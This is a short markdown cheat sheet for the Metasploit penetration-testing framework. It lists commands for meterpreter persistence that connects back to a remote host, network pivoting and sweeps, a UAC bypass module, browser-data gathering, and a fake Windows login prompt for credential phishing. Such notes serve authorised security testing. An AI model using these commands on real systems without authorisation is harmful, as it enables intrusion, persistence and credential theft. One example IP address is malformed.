metasploit.md 2.2 KB


title: Metasploit Framework categories: [cheatsheets]

tags: [security, pentesting]

Metasploit

1) Initialize Database

sh> service postgresql start
sh> msfdb init

2) Check Database Status:

msf> db_status

3) Update Metasploit:

sh> msfupdate

4) Login to Metasploit

msf> setConsoleLogging yes
msf> setSessionLogging yes   // for future sessions

msf> spool <FileName>       // save logged data into file
msf> save                   // save settings

Exploits/Payloads

1) Encrypt the different meterpreter stages:

msf> set EnableStageEncoding True

2) Autostart a script in a new meterpreter session

msf> set AutoRunScript post/windows/manage/migrate

-> or: there is a PrependMigrate option in some modules available

Persistence

msf> run persistence -p <PORT> -r <RHOST> -X -U -P <PAYLOAD>
-X: Start on Systemstart
-U: Start on Userlogin

Important:

  • Delte the persistent shell after finishing the job
  • remove-script is created when using the persistence module

Pivoting

1) create route into a session for the pivoting

msf> route add <netaddr> <netmask> <sess-id>
msf> route add 10.10.10.10.0 255.255.255.0 1

2) explore routed network

2.a) ping_sweep (doesn't need a route)

msf> use post/multi/gather/ping_sweep
msf> set RHOSTS 10.10.10.1-255
msf> set SESSION 2
msf> run

2.b) arp_sweep

msf> use post/multi/gather/arp_sweep

2.c) portscans

msf> use auxiliary/scanner/portscan/tcp

Interesting Modules

I) Exploitation

exploit/windows/local/bypassuac             // UAC Bypas
exploit/windows/local/trusted_service_path  // Checks for unquoted service paths

II) Information Gathering

post/windows/gather/winenum                 // mp> run winenum (-c: delete logs, -r: download registry, -m: winenum in sep. session)
post/windows/enum_chrome                    // Get Browserdata from chrome, ff, ie
post/windows/enum_firefox
post/windows/enum_ie
post/windows/gather/phish_windows_credentials  // PS Login Field for social engineering

III) Auxiliary

auxiliary/scanner/smb/smb_version
auxiliary/admin/smb/samba_symlink_traversal // follows symlinks (if in config: follow symlinks=yes )